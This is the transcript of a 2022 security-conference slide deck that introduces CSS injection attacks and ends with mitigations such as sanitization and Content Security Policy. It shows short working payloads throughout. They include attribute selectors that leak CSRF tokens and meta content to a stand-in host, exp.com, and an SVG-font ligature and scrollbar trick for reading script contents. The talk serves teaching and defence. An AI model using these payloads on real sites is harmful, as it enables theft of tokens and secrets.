Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Attacking web without JS - CSS injection

Huli
September 22, 2022

Attacking web without JS - CSS injection

When speaking of web security in front-end, XSS is the first thing that comes to mind. But, even without JavaScript, the attacker can still use other attack vectors like HTML injection and CSS injection! This talk is an introduction to CSS injection.

Huli

September 22, 2022
Tweet

More Decks by Huli

Other Decks in Programming

Transcript

  1. Attacking web without JS CSS Injection Huli from Cymetrics /

    OneInfinity @ CYBERSEC 2022
  2. About Huli • Security Researcher at Cymetrics / OneInfinity •

    CTF player at Water Paddler • https://blog.huli.tw/
  3. Front-end Security

  4. Front-end Security => XSS(Cross-Site Scripting)

  5. Front-end Security => XSS(Cross-Site Scripting)

  6. IE7 (15 years ago) <p style=" x:expression(alert(1)) ">

  7. CSS injection => Steal data via CSS

  8. CSS injection => Steal data via CSS How?

  9. input[value^="a"]{ background: url("//exp.com?a"); }

  10. CSS selectors input[value^="a"] // prefix input[value$="a"] // suffix input[value*="a"] //

    contains
  11. Steal input value <form> <input type=hidden name=token value=abc123> <input name="action"

    value="update"> <input type="submit"> </form>
  12. Steal input value <form> <input type=hidden name=token value=abc123> <input name="action"

    value="update"> <input type="submit"> </form> input[value^="a"]{ background: url("//exp.com?a"); }
  13. Steal input value <form> <input type=hidden name=token value=abc123> <input name="action"

    value="update"> <input type="submit"> </form> input[value^="a"] + input { background: url("//exp.com?a"); }
  14. Steal input value <form> <input name="action" value="update"> <input type="submit"> <input

    type=hidden name=token value=abc123> </form>
  15. has: to the rescue <form> <input name="action" value="update"> <input type="submit">

    <input type=hidden name=token value=abc123> </form> form:has(input[value^="a"]) { background: url("//exp.com?a"); }
  16. None
  17. Steal meta content <head> <meta name=token content=abc123> </head>

  18. Steal meta content <head> <meta name=token content=abc123> </head> meta[content^="a"] {

    background: url(//exp.com?a); }
  19. Steal meta content <head> <meta name=token content=abc123> </head> meta[content^="a"] {

    background: url(//exp.com?a); }
  20. Steal meta content <head> <meta name=token content=abc123> </head> meta {

    display: block; } meta[content^="a"] { background: url(//exp.com?a); }
  21. Steal meta content <head> <meta name=token content=abc123> </head> meta {

    display: block; } meta[content^="a"] { background: url(//exp.com?a); }
  22. Steal meta content <head> <meta name=token content=abc123> </head> meta[content^="a"] {

    background: url(//exp.com?a); }
  23. Steal meta content <head> <meta name=token content=abc123> </head> meta, head

    { display: block; } meta[content^="a"] { background: url(//exp.com?a); }
  24. None
  25. None
  26. Steal HackMD CSRF token

  27. Steal HackMD CSRF token

  28. Steal HackMD CSRF token HackMD Server

  29. Steal HackMD CSRF token HackMD Server server?token=a

  30. Steal HackMD CSRF token HackMD Server server?token=a Update content and

    <style>
  31. Steal HackMD CSRF token HackMD Server server?token=ab Update content and

    <style>
  32. Demo

  33. Steal CSRF token != CSRF 😢

  34. Steal any content <script> var secret = "abc123"; </script> Is

    it possible?
  35. ligature https://zh.m.wikipedia.org/zh-tw/File:Ligatures.svg

  36. ligature <svg> <defs> <font horiz-adv-x="0"> <font-face font-family="leak" units-per-em="1000" /> <glyph

    unicode="&quot;a" horiz-adv-x="10000" d="M1 0z"/> </font> </defs> </svg>
  37. ligature + scroll bar script { width: 300px; display: block;

    font-family: "leak"; white-space: nowrap; overflow-x: auto; } script::-webkit-scrollbar { background: blue; } script::-webkit-scrollbar:horizontal { background: url(https://exp.com?a); }
  38. ligature + scroll bar

  39. Mitigation • Sanitization • Content Security Policy • style-src •

    font-src • Check origin/referer header • Same-site cookie
  40. Reference 1. https://vwzq.net/slides/2019-s3_css_injection_attacks.pdf 2. https://x-c3ll.github.io/posts/CSS-Injection-Primitives/ 3. https://book.hacktricks.xyz/pentesting-web/xs-search/css-injection 4. https://research.securitum.com/stealing-data-in-great-style-how-to-use-css-to-attack- web-application/

    5. https://mksben.l0.cm/2021/11/css-exfiltration-svg-font.html 6. https://github.com/masatokinugawa/css-exfiltration-svg-font/
  41. Q&A